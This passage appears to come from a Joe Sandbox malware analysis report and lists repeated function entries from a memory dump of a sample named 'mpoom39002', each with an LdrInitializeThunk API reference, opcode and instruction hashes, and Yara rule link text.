Instruction Fuzzy Hash: D6C1B474E00218CFDB14DFA5D994BADBBB2BF88300F2084AAD409AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F0040 Relevance: 1.8, APIs: 1, Instructions: 268
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 003F010B

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f63e4ecc5c4f70d3e04d23ca32104b7953a0888f5d146e780c941a80e6058a1
Instruction ID: 2bf0a70b70efc7725b62978bdd9b714fe4f497d8060e9b545e75e9edc72144ac
Opcode Fuzzy Hash: 6f63e4ecc5c4f70d3e04d23ca32104b7953a0888f5d146e780c941a80e6058a1
Instruction Fuzzy Hash: 13C1B474E00218CFDB54DFA5D994BADBBB2BF88300F2084A9D909AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F38B8 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F3983

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 455caffe7d1e44fbe8d227fd503a22a782ca38eecedf6061f0a724bd1f43863c
Instruction ID: b7ad12606ab065741a224383cf6dcc99b7dd01c07946a08190e21f39321ddcc5
Opcode Fuzzy Hash: 455caffe7d1e44fbe8d227fd503a22a782ca38eecedf6061f0a724bd1f43863c
Instruction Fuzzy Hash: C9C1A274E00218CFDB54DFA5D995BADBBB2BF88300F2084A9D809AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F2BB0 Relevance: 1.8, APIs: 1, Instructions: 268
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 003F2C7B

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 67dc8858ca9e26205cc1536c87ec5a1f24d2d13394be881568b5f48917af16e2
Instruction ID: cfb1069ac6f5440883f9e2edf34ee73f72194faff503887a1ef8be83a7b31e42
Opcode Fuzzy Hash: 67dc8858ca9e26205cc1536c87ec5a1f24d2d13394be881568b5f48917af16e2
Instruction Fuzzy Hash: D3C1B374E00218CFDB54DFA5D994BADBBB2BF88300F2084A9D809AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F93B0 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F947B

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a5efae3d3a65893e52b909dee1521bb5c054da9c62b41a98322570dccb3f2b11
Instruction ID: f4db746b5e193e804bae127140d81903e26a510642b1b7c72ae74aecffc99c2e
Opcode Fuzzy Hash: a5efae3d3a65893e52b909dee1521bb5c054da9c62b41a98322570dccb3f2b11
Instruction Fuzzy Hash: B2C1B274E00218CFDB54DFA5D994BADBBB2BF88300F2084AAD509AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F86A8 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F8773

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 99b864c37c63ee7b29aa5c92052c49c9ac8680eccc550cf3f75048f55f7a91b7
Instruction ID: 41f0ce3799cb8a84c58f6db124235b41635bc6bbfe1a9bd4a779e00e72b3af90
Opcode Fuzzy Hash: 99b864c37c63ee7b29aa5c92052c49c9ac8680eccc550cf3f75048f55f7a91b7
Instruction Fuzzy Hash: 0DC1B374E00218CFDB54DFA5D994BADBBB2BF88300F2084AAD509AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F1EA8 Relevance: 1.8, APIs: 1, Instructions: 268
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 003F1F73

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6eb4dc5fd64d1a14c8077729521c3e647096552e2c2e6533a81d5bdc0a939bbd
Instruction ID: 06ae3483ed6179cd8b9111eaa0f7e498b0da44d6a044cb09231c7929aae343e3
Opcode Fuzzy Hash: 6eb4dc5fd64d1a14c8077729521c3e647096552e2c2e6533a81d5bdc0a939bbd
Instruction Fuzzy Hash: E0C1C374E00218CFDB54DFA5D994BADBBB2BF88300F2084A9D809AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F11A0 Relevance: 1.8, APIs: 1, Instructions: 268
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 003F126B

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d40759560f58ba6630ce5e9021f071b61df24e251ea9121ee57d4e2a0ade487b
Instruction ID: 16589925c8c4c5e5994fc882ce972fc60a87b0dbc14e5561a07ffcb0be6a63e7
Opcode Fuzzy Hash: d40759560f58ba6630ce5e9021f071b61df24e251ea9121ee57d4e2a0ade487b
Instruction Fuzzy Hash: 97C1B474E00218CFDB54DFA5D994BADBBB2BF89300F2084AAD409AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F0498 Relevance: 1.8, APIs: 1, Instructions: 268
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 003F0563

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6abed2ded2d686c710425ec759297eb4e8a15cf23f17b089c4c2e3fbdc3b3afd
Instruction ID: 6c496bd69715a8f1c8367506ddb4dd01081c9436e9103a653bab4b1c64230712
Opcode Fuzzy Hash: 6abed2ded2d686c710425ec759297eb4e8a15cf23f17b089c4c2e3fbdc3b3afd
Instruction Fuzzy Hash: DAC1B274E00218CFDB54DFA5D994BADBBB2BF88300F2084A9D809AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003FB698 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003FB763

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b5e23e5cc040501a4fa84e52a2d9bf00ac64b86e4becd478acc48d40523c9e52
Instruction ID: 84bd5a040852a2ef5d353e88b03b9bf50988bdb9f8da9d7ee7fe54648f00ca89
Opcode Fuzzy Hash: b5e23e5cc040501a4fa84e52a2d9bf00ac64b86e4becd478acc48d40523c9e52
Instruction Fuzzy Hash: 10C1B374E00218CFDB54DFA5D994BADBBB2BF88300F2085AAD409AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003FA990 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003FAA5B

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 12ea889f89faa357be8c068a1676e3592b99ffb16e0d9275bd561442b8384f97
Instruction ID: 3c79c502443005862be08c5d1cc52087b9da0cf9c5d3dd28b308b000b0fc7918
Opcode Fuzzy Hash: 12ea889f89faa357be8c068a1676e3592b99ffb16e0d9275bd561442b8384f97
Instruction Fuzzy Hash: 92C1B474E00218CFDB54DFA5D994BADBBB2BF88300F2085A9D809AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F15F8 Relevance: 1.8, APIs: 1, Instructions: 268
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 003F16C3

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: af9af3fb7fc40cc6a6b654fc7e0570a9bc35f73ebada92574bfeadcec959352b
Instruction ID: d25807e6403cee2497be2acc591488a80f540a46dddf2f806dcec1c163d370d7
Opcode Fuzzy Hash: af9af3fb7fc40cc6a6b654fc7e0570a9bc35f73ebada92574bfeadcec959352b
Instruction Fuzzy Hash: 4FC1B474E00218CFDB54DFA5D994BADBBB2BF88300F2085AAD409AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F08F0 Relevance: 1.8, APIs: 1, Instructions: 268
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 003F09BB

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a6c710bf6699025040cfb1813d734cad0385dfe20c94a45606b6fe0832ae9ac5
Instruction ID: 72e421fc3733abf3dd6c55f31b120159cb4ed856c7972b38abbddf4c99404a84
Opcode Fuzzy Hash: a6c710bf6699025040cfb1813d734cad0385dfe20c94a45606b6fe0832ae9ac5
Instruction Fuzzy Hash: A4C1B274E00218CFDB54DFA5D994BADBBB2BF88300F2085A9D809AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003FBAF0 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003FBBBB

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4c28e9d57023b990df44c74c8edd482bc301f64c2d74ab4af0b075ad30f5b401
Instruction ID: 0c37ca5aa800c80727b9a4d51fdf29207d4ef7d1fbfe2b0c9273120c0f14a47d
Opcode Fuzzy Hash: 4c28e9d57023b990df44c74c8edd482bc301f64c2d74ab4af0b075ad30f5b401
Instruction Fuzzy Hash: 8FC1C474E00218CFDB14DFA5D994BADBBB2BF88300F2084A9D509AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003FADE8 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003FAEB3

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b4de3c59d4887eb62ced76c5fc3230d6ca3cb3ee0cf9ac1ae3dc4d60b365266
Instruction ID: 1c10ee257e38a684f91734e7d0aa54857e39f6985bb37618f7415238b7ce926b
Opcode Fuzzy Hash: 8b4de3c59d4887eb62ced76c5fc3230d6ca3cb3ee0cf9ac1ae3dc4d60b365266
Instruction Fuzzy Hash: C4C1B374E00218CFDB54DFA5D994BADBBB2BF88300F2085A9D809AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003FA0E0 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003FA1AC

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6b1cce7cc02162154e1f16e3a5242f086b32d9e5c034be2f5920a9a782b14c9f
Instruction ID: 87a5c94ddea0ce94332276f9e5b2d595bcafe4bd3b3f80c8a0eb99da86a54e49
Opcode Fuzzy Hash: 6b1cce7cc02162154e1f16e3a5242f086b32d9e5c034be2f5920a9a782b14c9f
Instruction Fuzzy Hash: 0CC1B574E00218CFDB54DFA5D994BADBBB2BF88300F1084AAD409AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F45C0 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F468B

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 27b72336cb4e08dce76f33ad030d271a6614fe4f9f9e3f6ceda9ab9769931380
Instruction ID: 6101e8e6f97e73a9528000d66e36b28dbd4d3bf6fcef3e790be7e37040606e5d
Opcode Fuzzy Hash: 27b72336cb4e08dce76f33ad030d271a6614fe4f9f9e3f6ceda9ab9769931380
Instruction Fuzzy Hash: 7AC1C474E00218CFDB14DFA5D994BAEBBB2BF88300F2085A9D509AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F22F0 Relevance: 1.6, APIs: 1, Instructions: 105libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F23CB

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9ec18ae8d58252405c33c2f4159b8ea5fabf31990bc864d9f2b1a025276034a8
Instruction ID: d2aeeb2b0d716b49727394cde1d4bebc16dbea9a23fde67164431fbe89ddb114
Opcode Fuzzy Hash: 9ec18ae8d58252405c33c2f4159b8ea5fabf31990bc864d9f2b1a025276034a8
Instruction Fuzzy Hash: 50410470D00248CFDB19DFAAD8956AEFBB2AF89300F24C12AD414BB265DB345946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003F0D38 Relevance: 1.6, APIs: 1, Instructions: 104libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F0E13

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5ad731778347ee9323b7e8f73a80685b2075c314bbd7f9a10b728462b27da97c
Instruction ID: 098c8579f9a2041fd7c3257b33bbff0a69f7422bc9452ac9765fa56939402a03
Opcode Fuzzy Hash: 5ad731778347ee9323b7e8f73a80685b2075c314bbd7f9a10b728462b27da97c
Instruction Fuzzy Hash: 9B41F470D00248CFDB19DFAAD8956EEBBB2AF89300F24C52AD515BB265DB345946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003F93A0 Relevance: 1.6, APIs: 1, Instructions: 104libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F947B

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6c3a282af7de56822b1773ded2b345b2b918a8ca0b02c87c15a57efff647894c
Instruction ID: cb3d690d92c7443100c6205cd5c22fb7cb3d981df89b14e2976f2470bc82ea41
Opcode Fuzzy Hash: 6c3a282af7de56822b1773ded2b345b2b918a8ca0b02c87c15a57efff647894c
Instruction Fuzzy Hash: 9341D274D012088FDB19DFAAD8957EEBBF2AF99300F20812AD459BB255EB345946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003F8219 Relevance: 1.6, APIs: 1, Instructions: 103libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F82F3

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9d3e0742dc1b455d3f475783b26f6d0993fea49fddd93867ca654cf478bc9ac7
Instruction ID: d39de4356154082cfeb5776ff2fb61ccd0ab1ce6f51aeb2f0023c814c59885ad
Opcode Fuzzy Hash: 9d3e0742dc1b455d3f475783b26f6d0993fea49fddd93867ca654cf478bc9ac7
Instruction Fuzzy Hash: 5B412574D00248CFEB18CFAAC8556EEBBF2AF89300F24C12AD519BB265DB345906CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003F4A09 Relevance: 1.6, APIs: 1, Instructions: 103libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F4AE3

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1622cda81f20efcaf44f392b645d9b62cb3b823551ead486db6620d137995f96
Instruction ID: 9e9a768058f3b4b091a71083a6de1804cf5dc1dc4ba073b7e0258cb58c2b66ce
Opcode Fuzzy Hash: 1622cda81f20efcaf44f392b645d9b62cb3b823551ead486db6620d137995f96
Instruction Fuzzy Hash: 9D41E574D042488FDB19DFA6D9556EEBBB2AF89300F24C12AD415AB265DB345906CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003F45B0 Relevance: 1.6, APIs: 1, Instructions: 103libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F468B

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d332957b9332b2e4e819f0fed1cb73bf0a27d3e05c5fb8643976a3fc5d9bff90
Instruction ID: f41cbdb04330a3e0229399e925582371ac24688022b9238551962497ce1b2d86
Opcode Fuzzy Hash: d332957b9332b2e4e819f0fed1cb73bf0a27d3e05c5fb8643976a3fc5d9bff90
Instruction Fuzzy Hash: A4411470E012488FDB18DFAAD8556EEFBF2AF89300F20D12AD519BB265DB345906CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003FA980 Relevance: 1.6, APIs: 1, Instructions: 103libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003FAA5B

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f935e7e4a0d94ad0b444798408a3ad7faf46ce010261f3a067b98bfae8034c5
Instruction ID: 08702d7d248f21f2a3978806dccc6aeb6d8b01a8383b192ac82c9cefbdd5e610
Opcode Fuzzy Hash: 1f935e7e4a0d94ad0b444798408a3ad7faf46ce010261f3a067b98bfae8034c5
Instruction Fuzzy Hash: ED41E370D016488FDB19DFAAD9956EEFBF2AF88300F24C12AD419AB255DB345946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003F15EA Relevance: 1.6, APIs: 1, Instructions: 103libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F16C3

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a82d92ad5756cb5a34f7a53b84f3b601ce79c9720a3be21a8a22fd0cbedca1b2
Instruction ID: 9bdb9d9beb27a51dbb3f3c47a08fd7a76d94b3e0e9bcebc9081a853663d352a0
Opcode Fuzzy Hash: a82d92ad5756cb5a34f7a53b84f3b601ce79c9720a3be21a8a22fd0cbedca1b2
Instruction Fuzzy Hash: F5412374D00248CFEB19DFAAD8516EEBBF2AF89300F20D12AD519BB265DB345906CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003F4158 Relevance: 1.6, APIs: 1, Instructions: 102libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F4233

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bcfb04e3f6b5aef03bc54e2dc5564950401600db83621347caaf7d66fff5457c
Instruction ID: 721ebbe7e71fd7484b74089355bc8d7862bd23ada3db029ab8c308c46f476b7f
Opcode Fuzzy Hash: bcfb04e3f6b5aef03bc54e2dc5564950401600db83621347caaf7d66fff5457c
Instruction Fuzzy Hash: 0D41F570E01248CFDB19DFAAD9556EEBBB2BF89300F24C12AD419BB265DB345946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003F9C50 Relevance: 1.6, APIs: 1, Instructions: 102libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F9D2B

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 44ea1725db448baf40dcebafe919297398faa2b11ca86761e5ef05c1faf5a74a
Instruction ID: e3930f3d0eaf148e55c5e607770415e144de088ca77930c8087ca184f9911e2f
Opcode Fuzzy Hash: 44ea1725db448baf40dcebafe919297398faa2b11ca86761e5ef05c1faf5a74a
Instruction Fuzzy Hash: D1410570D052488FDB18DFAAD9946EEFBF2AF88300F24C12AD419AB265DB345946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003F1192 Relevance: 1.6, APIs: 1, Instructions: 102libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F126B

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: da71e5175db1e067446248d8b4b6b67b41db481b1e40d171cc1c076594132988
Instruction ID: fc87467a837e1aa59f5596580d81c8831cea6d7932ea884c2c283f88e7886d32
Opcode Fuzzy Hash: da71e5175db1e067446248d8b4b6b67b41db481b1e40d171cc1c076594132988
Instruction Fuzzy Hash: BD410570E00248CFDB09DFBAD8456EEBBB2AF89300F24C12AD519AB265DB345946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003F8AF0 Relevance: 1.6, APIs: 1, Instructions: 102libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F8BCB

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b5c9083e30f5dcdcd76178e2ee72184fdbfe984e09a374dcd6754447baf1e501
Instruction ID: 32eed4d87c8208d0fb4124f1052bbd6a0fd38b3f600d5d5216399202c7866e69
Opcode Fuzzy Hash: b5c9083e30f5dcdcd76178e2ee72184fdbfe984e09a374dcd6754447baf1e501
Instruction Fuzzy Hash: A3410570D002488FDB19DFAAD9956EEFBF2AF89300F24C12AD519AB265DB345906CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F3451 Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F352B

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3aebfc475d9ef51ada7d1f2ae2e2784bf72f8b8a71c4279915ff7d5b03c2c695
Instruction ID: 88bab20830ea3ca70ea4c546904abab60a6b5cb34f058888699c4b50a8403e17
Opcode Fuzzy Hash: 3aebfc475d9ef51ada7d1f2ae2e2784bf72f8b8a71c4279915ff7d5b03c2c695
Instruction Fuzzy Hash: C541F570D00248CFDB19DFAAD5556EDBBF2AF89300F24C12AD519BB265DB345A06CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003F8F4C Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F9023

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a2fa01c26cc3d95cbcd5bda14a64a08168be24ab305c7ae6205797ecdcf736fa
Instruction ID: c1bfc5f14b2f88c6f4c969e67ba7829728079f93f08729d87889ee40f0c29000
Opcode Fuzzy Hash: a2fa01c26cc3d95cbcd5bda14a64a08168be24ab305c7ae6205797ecdcf736fa
Instruction Fuzzy Hash: 9C41D374D002488FEB19DFAAD9557AEFBF2AF89300F24C12AD519BB265DB345906CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003F2BA0 Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F2C7B

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
